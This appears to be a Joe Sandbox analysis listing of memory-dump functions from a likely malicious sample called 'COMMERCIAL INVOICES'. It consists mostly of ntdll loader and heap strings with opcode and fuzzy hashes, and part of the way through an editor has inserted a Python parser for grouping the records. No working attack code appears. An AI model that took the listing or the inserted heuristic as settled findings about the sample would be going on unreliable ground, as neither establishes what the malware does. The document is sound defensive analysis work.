• SXS: %s() passed the empty activation context, xrefs: 012B21DE
• .Local, xrefs: 012728D8
Memory Dump Source
• Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
Similarity
• API ID:
• String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
• API String ID: 0-1239276146
• Opcode ID: e18650e5553efbc49ce13b0576d776eb72cc4c452e9da32db3c9b0cecf3e3cec
• Instruction ID: 50a1a9bad30d865992525b73ecabc31bdbbabc0e228c6edca2b22db4639680a3
• Opcode Fuzzy Hash: e18650e5553efbc49ce13b0576d776eb72cc4c452e9da32db3c9b0cecf3e3cec
• Instruction Fuzzy Hash: CAA1B33192122ADBDB25CF58CC84BEAB7B5BF58354F2441E9DA08A7251D770AE81CF90
Strings
• ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 012A10AE
• ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 012A1028
• ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 012A0FE5
• ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 012A106B
Memory Dump Source
• Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
Similarity
• API ID:
• String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
• API String ID: 0-1468400865
• Opcode ID: 22db02b6027fd0ffcabc419fc3bd36b32ef2cb3df987818bb4d68f85f2cb783c
• Instruction ID: 96887f4083ce6d26dbf3f988857515eae3dd6ee3e27670c494d0fcbb9e3b9f7b
• Opcode Fuzzy Hash: 22db02b6027fd0ffcabc419fc3bd36b32ef2cb3df987818bb4d68f85f2cb783c
• Instruction Fuzzy Hash: EB71E3B19243469FCB21EF18C885BA77FA8AF95764F400468FE488B186D774D588CBD2
Strings
• apphelp.dll, xrefs: 01262462
• LdrpDynamicShimModule, xrefs: 012AA998
• minkernel\ntdll\ldrinit.c, xrefs: 012AA9A2
• Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 012AA992
Memory Dump Source
• Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
Similarity
• API ID:
• String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
• API String ID: 0-176724104
• Opcode ID: f692a436c91daa9145d9548f93e44bf8d8d55e0889b1e72719554438b322da34
• Instruction ID: 443efb9f31fc73ba85ce2096e4200a0cbaea07aaa708d43d6a5f48a359b25816
• Opcode Fuzzy Hash: f692a436c91daa9145d9548f93e44bf8d8d55e0889b1e72719554438b322da34
• Instruction Fuzzy Hash: 61315971A20203EFDB31DF5DD882ABA7BBCFF84B04F564019EA116B245C7B49981C780
Strings
• Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0125327D
• HEAP[%wZ]: , xrefs: 01253255
• HEAP: , xrefs: 01253264
Memory Dump Source
• Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
Similarity
• API ID:
• String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
• API String ID: 0-617086771
• Opcode ID: eae516dc76b9e476af6f609b7981939abb183a65e16dcd4a41931f276c4f09f7
• Instruction ID: 29ab8b0b4ef89faa24c6a9d63e476f4d8edf90c3ae1360299160154562f8a659
• Opcode Fuzzy Hash: eae516dc76b9e476af6f609b7981939abb183a65e16dcd4a41931f276c4f09f7
• Instruction Fuzzy Hash: 1D92CD71A2424ADFDB65CF68C4807AEBBF1FF48310F188059E949AB392D775A941CF50
Strings
Memory Dump Source
• Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
Similarity
• API ID:
• String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
• API String ID: 0-4253913091
• Opcode ID: 4a3e21ed9f5b2878f31c2161d26328c57bb4ac573e6239260310947564c38cfd
• Instruction ID: 4c3a9542025ec4217f870f814ff670d71817381ea72a8334527779650e511237
• Opcode Fuzzy Hash: 4a3e21ed9f5b2878f31c2161d26328c57bb4ac573e6239260310947564c38cfd
• Instruction Fuzzy Hash: 54F1CA70A20606DFEB25CF68C895B7AB7F5FF44704F1481A8EA069B385D770E981CB94
Strings
Memory Dump Source
• Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
Similarity
• API ID:
• String ID: $@
• API String ID: 0-1077428164
• Opcode ID: f153905161d0147f7e341f8bac6be9cf0f6a06dfc8d4977fbb20a6348a8020a2
• Instruction ID: 6791a9536ae576f3a55c988be0a3b260454b46755a8abcaf15e15c8a126ce126
• Opcode Fuzzy Hash: f153905161d0147f7e341f8bac6be9cf0f6a06dfc8d4977fbb20a6348a8020a2
• Instruction Fuzzy Hash: 5AC263716283429FD725CF28C841BABBBE9BF88754F04892DFA89C7281D774D845CB52
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                                                                                                                                      • API String ID: 0-2779062949
                                                                                                                                                                                                                                      • Opcode ID: a4db1b95187fc130e158030be4e7bf6e947c1eb8c99d3339e9348b95d6488409
                                                                                                                                                                                                                                      • Instruction ID: 8ddd92bfad88e7e6cfb1732c4feace739cc91fabf58bbdb2a63194438c9b4487
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a4db1b95187fc130e158030be4e7bf6e947c1eb8c99d3339e9348b95d6488409
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ACA14F7192162A9BDF31DF68CC88BAAB7B8EF44710F1001E9EA09E7250D7359E84CF54
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • LdrpCheckModule, xrefs: 012AA117
                                                                                                                                                                                                                                      • Failed to allocated memory for shimmed module list, xrefs: 012AA10F
                                                                                                                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 012AA121
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                      • API String ID: 0-161242083
                                                                                                                                                                                                                                      • Opcode ID: 42d7f337743021886f8e83f96007b32fa5b43634b1d7edc33642f3ad89bbba81
                                                                                                                                                                                                                                      • Instruction ID: 57d917c4592c1f044697eeb8ba83d0fb23ed53dcd3b8e91deaa4b360f7519bf6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 42d7f337743021886f8e83f96007b32fa5b43634b1d7edc33642f3ad89bbba81
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2471A070A20206EFDB25DF68C981ABEB7F8FF44304F144469E9029B295E774AA81DB54
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                                                                      • API String ID: 0-1334570610
                                                                                                                                                                                                                                      • Opcode ID: 0391b830dba0f090477ca22270e98d81d0587b3816047f2c0c2f14041f4cb0e9
                                                                                                                                                                                                                                      • Instruction ID: 69082c9afd72e830fc5e815999bff0accdd9d21dbf417e1072bdac214fb1c2bd
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0391b830dba0f090477ca22270e98d81d0587b3816047f2c0c2f14041f4cb0e9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6461D370620302DFDB69CF28C881B6ABBE1FF84704F148559F9558F296D7B0E881CB95
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • Failed to reallocate the system dirs string !, xrefs: 012B82D7
                                                                                                                                                                                                                                      • LdrpInitializePerUserWindowsDirectory, xrefs: 012B82DE
                                                                                                                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 012B82E8
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                      • API String ID: 0-1783798831
                                                                                                                                                                                                                                      • Opcode ID: 44d330b4ad1974dfb3ba46d240be948822f318ff3c70057ad9377519c3a3145d
                                                                                                                                                                                                                                      • Instruction ID: eb8029e8acbb3cb035365b8de8df678b8464b3950a25d60b0462dbf82ccca568
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 44d330b4ad1974dfb3ba46d240be948822f318ff3c70057ad9377519c3a3145d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A941E4B1564306EBC725EB78D881B6BB7ECAF44790F00452AFA48D7290EB74D8108B95
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 012FC1C5
                                                                                                                                                                                                                                      • @, xrefs: 012FC1F1
                                                                                                                                                                                                                                      • PreferredUILanguages, xrefs: 012FC212
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                                                                                                                                      • API String ID: 0-2968386058
                                                                                                                                                                                                                                      • Opcode ID: a320d3259b7f060aab4cdac9161c3be22611576dcaa70089d2aaff98570005d3
                                                                                                                                                                                                                                      • Instruction ID: e2c03be998c23896130fb28c977c9baa6fe74389542e34367f0a4329251f7bef
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a320d3259b7f060aab4cdac9161c3be22611576dcaa70089d2aaff98570005d3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C5415175E2020EEBDB11DAD8C891FEEFBB8EB14710F14407AE709A7280D7749A448B50
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                                                                                                                                      • API String ID: 0-1373925480
                                                                                                                                                                                                                                      • Opcode ID: 7628b6dea047d0ca4032ff31f9a0398dcc7e456611c8698bc8828077d3de51ec
                                                                                                                                                                                                                                      • Instruction ID: aca3e2449d9743237c246dcc7247d41cd93ff0fd40b78c75232e37334c0a1ce1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7628b6dea047d0ca4032ff31f9a0398dcc7e456611c8698bc8828077d3de51ec
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 89413831A25299CBEB25EBE9C844BADBBB4FF55340F14045ADA01EBB81D774D901CB10
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 012C4899
                                                                                                                                                                                                                                      • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 012C4888
                                                                                                                                                                                                                                      • LdrpCheckRedirection, xrefs: 012C488F
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                                                                                                                      • API String ID: 0-3154609507
                                                                                                                                                                                                                                      • Opcode ID: 0d45e20484723d8f4e5c51c6f63b778868d04252b5fb8433777a97a1828f9f7c
                                                                                                                                                                                                                                      • Instruction ID: 32a5df9cf23161ba170353ed8dc340ee8c5cb3812629a2d678742f1893d6a5d7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0d45e20484723d8f4e5c51c6f63b778868d04252b5fb8433777a97a1828f9f7c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C241C132A246929FCB22EF58D861A277BE8AF89F50F05075DEF49D7251D730D800CB91
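The function records above all come from one PE-backed dump of process 4 at 01210000 and are dense with ntdll-internal strings (minkernel\ntdll\ldrinit.c, Ldrp* routine names, heap assertion text). The following is an added example, not part of the Joe Sandbox report: a small parser for this record layout that groups records by dumped region and lists the ntdll-internal strings seen in each, so an analyst can pivot from the listing to the regions worth inspecting. The two sample records are a constructed subset copied from the listing; the choice of NTDLL_MARKERS and the idea that such a region deserves a closer look are the editor's assumptions, not findings the report states.

```python
import re
from collections import defaultdict

# Constructed sample: two records in the exact shape the report uses.
SAMPLE = """\
Strings
• LdrpCheckModule, xrefs: 012AA117
• Failed to allocated memory for shimmed module list, xrefs: 012AA10F
• minkernel\\ntdll\\ldrinit.c, xrefs: 012AA121
Memory Dump Source
• Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
Similarity
• API ID:
• String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\\ntdll\\ldrinit.c
• API String ID: 0-161242083
• Opcode ID: 42d7f337743021886f8e83f96007b32fa5b43634b1d7edc33642f3ad89bbba81
• Instruction ID: 57d917c4592c1f044697eeb8ba83d0fb23ed53dcd3b8e91deaa4b360f7519bf6
• Opcode Fuzzy Hash: 42d7f337743021886f8e83f96007b32fa5b43634b1d7edc33642f3ad89bbba81
• Instruction Fuzzy Hash: 2471A070A20206EFDB25DF68C981ABEB7F8FF44304F144469E9029B295E774AA81DB54
Strings
Memory Dump Source
• Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
Similarity
• API ID:
• String ID: FilterFullPath$UseFilter$\\??\\
• API String ID: 0-2779062949
• Opcode ID: a4db1b95187fc130e158030be4e7bf6e947c1eb8c99d3339e9348b95d6488409
• Instruction ID: 8ddd92bfad88e7e6cfb1732c4feace739cc91fabf58bbdb2a63194438c9b4487
• Opcode Fuzzy Hash: a4db1b95187fc130e158030be4e7bf6e947c1eb8c99d3339e9348b95d6488409
• Instruction Fuzzy Hash: ACA14F7192162A9BDF31DF68CC88BAAB7B8EF44710F1001E9EA09E7250D7359E84CF54
"""

FIELD_RE = re.compile(r"^• ([^:]+): ?(.*)$")
XREF_RE = re.compile(r"^• (.*), xrefs: ([0-9A-Fa-f]+)$")
SOURCE_RE = re.compile(r"^(\S+\.sdmp), Offset: ([0-9A-Fa-f]+), based on PE: (true|false)$")
SECTION_HEADERS = ("Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity")

# Assumed markers for "this code is ntdll's own": editor's choice, not the report's.
NTDLL_MARKERS = ("minkernel\\ntdll\\", "Ldrp")


def parse_records(text):
    """One dict per function record. A record starts at a bare 'Strings' line;
    lines under it are '<string>, xrefs: <addr>', everything else is '• Key: Value'."""
    records, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Strings":
            cur = {"strings": [], "fields": {}}
            records.append(cur)
            section = "strings"
            continue
        if cur is None:
            continue
        if line in SECTION_HEADERS:
            section = line
            continue
        if section == "strings":
            m = XREF_RE.match(line)
            if m:
                cur["strings"].append((m.group(1), int(m.group(2), 16)))
                continue
        m = FIELD_RE.match(line)
        if m:
            cur["fields"][m.group(1)] = m.group(2)
    return records


def source_region(record):
    """(dump file, region base, is_pe_backed) for a record, or None if absent."""
    m = SOURCE_RE.match(record["fields"].get("Source File", ""))
    if not m:
        return None
    return m.group(1), int(m.group(2), 16), m.group(3) == "true"


def record_strings(record):
    """Prefer the xref'd strings; fall back to the '$'-joined String ID.
    Splitting on '$' is lossy when a string itself contains '$' (e.g. '$@')."""
    if record["strings"]:
        return [s for s, _ in record["strings"]]
    return [s for s in record["fields"].get("String ID", "").split("$") if s]


def regions_with_ntdll_strings(records):
    """Map (dump file, base) -> set of ntdll-internal strings referenced there."""
    hits = defaultdict(set)
    for rec in records:
        src = source_region(rec)
        if src is None:
            continue
        for s in record_strings(rec):
            if any(marker in s for marker in NTDLL_MARKERS):
                hits[(src[0], src[1])].add(s)
    return dict(hits)


if __name__ == "__main__":
    for (dump, base), strs in regions_with_ntdll_strings(parse_records(SAMPLE)).items():
        print(f"{dump} @ {base:08X}: {sorted(strs)}")
```

Run it over the whole function listing of a report (copy the text into SAMPLE or read it from a file) and the output is one line per dumped region that references ntdll's own source paths or loader routines. The xref'd string list is preferred over the String ID field because the latter joins strings with '$', which is ambiguous once a string itself contains that character.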
Strings
Memory Dump Source
• Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
Similarity
• API ID:
• String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
• API String ID: 0-2558761708
Strings
• LdrpInitializationFailure, xrefs: 012C20FA
• Process initialization failed with status 0x%08lx, xrefs: 012C20F3
• minkernel\ntdll\ldrinit.c, xrefs: 012C2104
Similarity
• API ID:
• String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
• API String ID: 0-2986994758
APIs
Strings
Similarity
• API ID: ___swprintf_l
• String ID: #%u
• API String ID: 48624451-232158463
Strings
• LdrResSearchResource Exit, xrefs: 0124AA25
• LdrResSearchResource Enter, xrefs: 0124AA13
Similarity
• API ID:
• String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
• API String ID: 0-4066393604
Strings
Similarity
• API ID:
• String ID: `$`
• API String ID: 0-197956300
Strings
Similarity
• API ID: InitializeThunk
• String ID: Legacy$UEFI
• API String ID: 2994545307-634100481
Strings
Similarity
• API ID:
• String ID: @$MUI
• API String ID: 0-17815947
Strings
• TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0124063D
• kLsE, xrefs: 01240540
Similarity
• API ID:
• String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
• API String ID: 0-2547482624
Strings
• RtlpResUltimateFallbackInfo Exit, xrefs: 0124A309
• RtlpResUltimateFallbackInfo Enter, xrefs: 0124A2FB
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                                                                                                                                      • API String ID: 0-2876891731
                                                                                                                                                                                                                                      • Opcode ID: b63a8c1fae956ed36d367210e11c91e1e62b6b33c4de21dbe4db25a67135de99
                                                                                                                                                                                                                                      • Instruction ID: 5b646b6262e1a7ce4f547697a854a48020f9397933c3681b70de96e743231055
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b63a8c1fae956ed36d367210e11c91e1e62b6b33c4de21dbe4db25a67135de99
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6A419031A64646DBDB29CF59C440B69BBB4FF85700F2444A9EA02DB291F3B5D940CB50
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                                      • String ID: Cleanup Group$Threadpool!
                                                                                                                                                                                                                                      • API String ID: 2994545307-4008356553
                                                                                                                                                                                                                                      • Opcode ID: 05ff2a1bb571943ad6bd2f1162a419921fd8fb76936d3a62a2231362fa340f5a
                                                                                                                                                                                                                                      • Instruction ID: 38e6fa834fcc57494ec03772c2f0612565892392275fbf4bbde4bd8e342a76f8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 05ff2a1bb571943ad6bd2f1162a419921fd8fb76936d3a62a2231362fa340f5a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BD01F4B2260700AFD311DF14CD46F2A77E8E795725F048979A648C7194E374D904CB4A
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: MUI
                                                                                                                                                                                                                                      • API String ID: 0-1339004836
                                                                                                                                                                                                                                      • Opcode ID: 20805219770c1f0c2f627c63e6b31ef3922c496ce9395fae710c8a79cc22c85b
                                                                                                                                                                                                                                      • Instruction ID: 88a8ba67f707688b950a2e017e72671fe4e52edac1c1eb73caa909b8aff58e53
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 20805219770c1f0c2f627c63e6b31ef3922c496ce9395fae710c8a79cc22c85b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DF827B75E212198BEB29CFADC880BEDBBB1FF58310F14816ADA19AB351D7709941CF50
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 0-3916222277
                                                                                                                                                                                                                                      • Opcode ID: dbb61ff2119ffa3908318a4347e672f0a7b515fe97db3f6d5b1081ba19e12fff
                                                                                                                                                                                                                                      • Instruction ID: 5037aa3d140db600a2172030b944647705b3cce5f924758d2e3eb396e60ce146
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dbb61ff2119ffa3908318a4347e672f0a7b515fe97db3f6d5b1081ba19e12fff
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0591627195021AAFEB21DF95CC85FAEBBB8EF14B50F200159F701AB291D774AD40CBA0
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 0-3916222277
                                                                                                                                                                                                                                      • Opcode ID: 74223d82f93c93d31690272db7d3625885e0df61dc28da2b886c9cc5ba978eb9
                                                                                                                                                                                                                                      • Instruction ID: 413d1b0a56417dcb5e9073191b4e56b86a0c2e8ca21642491b3dc9bc7c69e352
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 74223d82f93c93d31690272db7d3625885e0df61dc28da2b886c9cc5ba978eb9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E191B03192164AAFDB22AFA4DC88FFFBBB9EF55740F550025F600A7250EB749941CB90
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: GlobalTags
                                                                                                                                                                                                                                      • API String ID: 0-1106856819
                                                                                                                                                                                                                                      • Opcode ID: f7c761f1b9c7353e7ab9d21d2956cbe2f5a82b85ce20695030739e08be3556bf
                                                                                                                                                                                                                                      • Instruction ID: 1a1d83ced15839b2c92555a9b7afcd7f4152f9d05b9489da748fced4023f8ade
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f7c761f1b9c7353e7ab9d21d2956cbe2f5a82b85ce20695030739e08be3556bf
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7E717DB5E2020A9FDF28CF9CC5916EDBBB2FF48790F14812EEA05A7241E7719945CB50
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: .mui
                                                                                                                                                                                                                                      • API String ID: 0-1199573805
                                                                                                                                                                                                                                      • Opcode ID: 90611ac34bf6383f5c8a18abebb36ccb23975e35ed9422881dc331e9eb98bab2
                                                                                                                                                                                                                                      • Instruction ID: faab8a0bd9caac1ec899d7a4c5188aad52ca96488d96b8372fc2ef197d1a9067
